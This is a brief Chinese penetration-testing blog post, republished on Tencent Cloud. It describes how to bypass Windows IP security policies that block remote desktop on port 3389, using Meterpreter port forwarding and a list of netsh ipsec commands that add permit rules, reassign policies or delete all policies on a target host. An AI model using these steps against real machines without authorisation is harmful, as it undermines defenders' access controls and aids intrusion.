IP安全策略限制3389登录的绕过方式

潇湘信安

发布于 2021-03-10 15:10:33

2.7K0

发布于 2021-03-10 15:10:33

声明：该公众号大部分文章来自作者日常学习笔记，也有少部分文章是经过原作者授权和其他公众号白名单转载，未经授权，严禁转载，如需转载，联系开白。请勿利用文章内的相关技术从事非法测试，如因此产生的一切不良后果与文章作者和本公众号无关。

症状说明：

远程桌面由于以下原因之一无法连接到远程计算机：确保打开远程计算机，连接到网络并启用远程访问"。

问题原因：

secpol.msc中设置了IP安全策略，如：仅允许或拒绝特定IP访问，或是直接拒绝了所有IP访问。可自定义IP安全规则，可以设置为任何IP和端口，支持的协议类型有：TCP/UDF/RDP/ICMP/EGP/RAW/RVD等。

IP安全策略这个功能有点类似于XP/2003的TCP/IP筛选，只是更加强大了。

解决方案：

(1) 使用Meterpreter的portfwd命令将目标的3389端口转发出来后即可成功绕过IP安全策略，因为最终流量是走的它本机，如：

(2) 直接在命令行使用以下几条Netsh ipsec命令添加或删除目标机器的IP安全策略规则来进行绕过。

添加IP安全策略：

netsh ipsec static add policy name=阻止3389端口

添加IP筛选器名：

netsh ipsec static add filterlist name=放行192.168.1.103

添加IP筛选器：

netsh ipsec static add filter filterlist=放行192.168.1.103 srcaddr=192.168.1.103 dstaddr=Me dstport=3389 protocol=TCP

添加筛选器操作：

netsh ipsec static add filteraction name=放行 action=permit or block

添加IP安全规则：

netsh ipsec static add rule name=放行192.168.1.103 policy=阻止3389端口 filterlist=放行192.168.1.103 filteraction=放行

激活指定安全策略：

netsh ipsec static set policy name=阻止3389端口 assign=y or n

导出IP安全策略：

netsh ipsec static exportpolicy C:\Windows\debug\WIA\ip.ipsec

导入IP安全策略：

netsh ipsec static importpolicy C:\Windows\debug\WIA\ip.ipsec

删除所有安全策略：

netsh ipsec static del all

本文参与腾讯云自媒体分享计划，分享自微信公众号。

原始发表：2021-02-26，如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自潇湘信安微信公众号，前往查看

如有侵权，请联系 cloudcommunity@tencent.com 删除。

本文参与腾讯云自媒体分享计划，欢迎热爱写作的你一起参与！

登录后参与评论

0 条评论

热度